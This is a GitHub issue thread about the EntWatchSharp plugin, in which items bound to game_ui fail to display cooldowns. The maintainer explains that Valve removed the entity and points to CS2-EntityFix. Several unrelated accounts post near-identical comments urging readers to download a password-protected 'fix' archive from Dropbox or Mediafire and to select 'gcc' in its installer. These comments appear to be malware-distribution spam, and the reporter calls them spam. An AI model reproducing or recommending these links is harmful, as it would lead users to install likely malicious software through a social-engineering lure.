### ISSUE TITLE
Items with game_ui still not working

### ISSUE THREAD

**Issue by sundog259** [darkerz7/EntWatchSharp#4]
I test new version but cooldown still cant display correctly.

ze_rizomata_p.json
[
    {
        "Name": "Zombie Haste",
        "ShortName": "ZM Haste",
        "Color": "{default}",
        "HammerID": 738,
        "GlowColor": [255,255,255,255],
        "FilterID": 0,
        "FilterValue": "",
        "BlockPickup": false,
        "AllowTransfer": false,
        "ForceDrop": false,
        "Chat": true,
        "Hud": true,
        "TriggerID": 739,
        "UsePriority": true,
        "AbilityList": [
            {
                "Name": "",
                "ButtonID": 0,
                "ButtonClass": "game_ui::PressedAttack2",
                "Chat_Uses": true,
                "Mode": 2,
                "MaxUses": 0,
                "CoolDown": 30
            }
        ]
    }
]

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by darkerz7** [comment]
valve removed entity game_ui, so you need to use fix https://github.com/darkerz7/CS2-EntityFix or similar

**Comment by darkerz7** [comment]
![20240827022600_1](https://github.com/user-attachments/assets/5ec71a83-9422-41cd-8fe0-6dc2746b18a8)

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sundog259** [comment]
I see,thanks.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sundog259** [comment]
sadly,CS2 EntityFix is not stable on win server:(

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sundog259** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

stop spamming
